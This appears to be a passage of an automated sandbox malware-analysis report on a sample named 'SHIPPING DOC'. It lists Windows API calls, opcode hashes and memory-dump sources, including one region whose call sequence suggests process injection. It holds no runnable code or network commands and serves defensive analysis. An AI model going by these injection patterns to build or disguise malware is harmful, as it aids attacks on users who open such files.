                                                                                                                      • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4163294574-0
                                                                                                                      • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                                                                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                      • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                                                                                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                      • _strcat.LIBCMT ref: 0040F786
                                                                                                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3199840319-0
                                                                                                                      • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                      • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeInfoLibraryParametersSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3403648963-0
                                                                                                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                      • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 00415012
                                                                                                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2999321469-0
                                                                                                                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03CF0BDB
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03CF0C71
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03CF0C93
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction ID: b2226daf78aced051c6609b30fd108ddcb7c1f03d7cc25065c0cec3ba79176eb
                                                                                                                      • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction Fuzzy Hash: 4A12DE24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                                                                      • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                      • Opcode Fuzzy Hash: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                                                                                                                      • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                      • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                      • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                      • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                      • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                      • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                      • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3031932315-0
                                                                                                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                      APIs
                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3934441357-0
                                                                                                                      • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                      • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                      • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                      • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                      • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                      • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                      • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 03CF1431
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: 6cb29bdb54394ef0772bd1fe1517baf96b0cdfd49442c2f2bcc43760d9156427
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: 0BE0E67494010DDFDB00EFB8D54969E7FB4EF04301F1041A1FD01D2280D6309D508A62
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                      • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00A2E5A0,00000000,00000000,00000000), ref: 0047CB9B
